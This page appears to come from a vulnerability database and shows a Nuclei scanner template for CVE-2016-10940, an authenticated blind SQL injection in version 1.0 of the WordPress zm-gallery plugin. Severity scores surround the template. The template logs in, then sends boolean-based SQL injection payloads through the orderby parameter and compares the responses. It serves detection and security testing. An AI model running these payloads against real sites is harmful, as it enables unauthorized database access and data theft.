Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2016-10940
HistoryFeb 02, 2022 - 3:27 p.m.

WordPress zm-gallery plugin 1.0 SQL Injection

2022-02-0215:27:47
ProjectDiscovery
github.com
2
wordpress
zm-gallery plugin
sql injection
cve-2016-10940
wpscan
authenticated

CVSS2

6.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

SINGLE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:S/C:P/I:P/A:P

CVSS3

7.2

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

HIGH

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

EPSS

0.007

Percentile

80.4%

zm-gallery plugin 1.0 for WordPress is susceptible to SQL injection via the order parameter.

id: CVE-2016-10940

info:
  name: WordPress zm-gallery plugin 1.0 SQL Injection
  author: cckuailong,daffainfo
  severity: high
  description: zm-gallery plugin 1.0 for WordPress is susceptible to SQL injection via the order parameter.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
  remediation: |
    Update to the latest version of the zm-gallery plugin or apply the patch provided by the vendor.
  reference:
    - https://wpscan.com/vulnerability/c0cbd314-0f4f-47db-911d-9b2e974bd0f6
    - https://lenonleite.com.br/en/2016/12/16/zm-gallery-1-plugin-wordpress-blind-injection/
    - https://nvd.nist.gov/vuln/detail/CVE-2016-10940
    - http://lenonleite.com.br/en/2016/12/16/zm-gallery-1-plugin-wordpress-blind-injection/
    - https://wordpress.org/plugins/zm-gallery/#developers
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 7.2
    cve-id: CVE-2016-10940
    cwe-id: CWE-89
    epss-score: 0.00776
    epss-percentile: 0.80947
    cpe: cpe:2.3:a:zm-gallery_project:zm-gallery:1.0:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 3
    vendor: zm-gallery_project
    product: zm-gallery
    framework: wordpress
  tags: cve,cve2016,wpscan,sqli,wp,wordpress,wp-plugin,authenticated,zm-gallery_project

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Origin: {{RootURL}}
        Content-Type: application/x-www-form-urlencoded
        Cookie: wordpress_test_cookie=WP%20Cookie%20check

        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
      - |
        GET /wp-admin/admin.php?page=zm_gallery&orderby=(SELECT%20(CASE%20WHEN%20(7422=7422)%20THEN%200x6e616d65%20ELSE%20(SELECT%203211%20UNION%20SELECT%208682)%20END))&order=desc HTTP/1.1
        Host: {{Hostname}}
      - |
        GET /wp-admin/admin.php?page=zm_gallery&orderby=(SELECT%20(CASE%20WHEN%20(7422=7421)%20THEN%200x6e616d65%20ELSE%20(SELECT%203211%20UNION%20SELECT%208682)%20END))&order=desc HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code_1 == 302 && status_code_2 == 200 && status_code_3 == 200'
          - 'contains(body_2, "[zm_gallery id=")'
          - 'contains(body_2, "<th scope=\"row\" class=\"check-column\">")'
          - '!contains(body_3, "<th scope=\"row\" class=\"check-column\">")'
        condition: and
# digest: 490a004630440220699b403999a44dfa1c0a95c442149578cb0dba8769c29aff63008cc829004d2202201090107521d760927c5f1134bbceda7facb495a7c6291a6a0669d3ca7a6832ef:922c64590222798bb761d5b6d8e72950

CVSS2

6.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

SINGLE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:S/C:P/I:P/A:P

CVSS3

7.2

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

HIGH

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

EPSS

0.007

Percentile

80.4%

Related for NUCLEI:CVE-2016-10940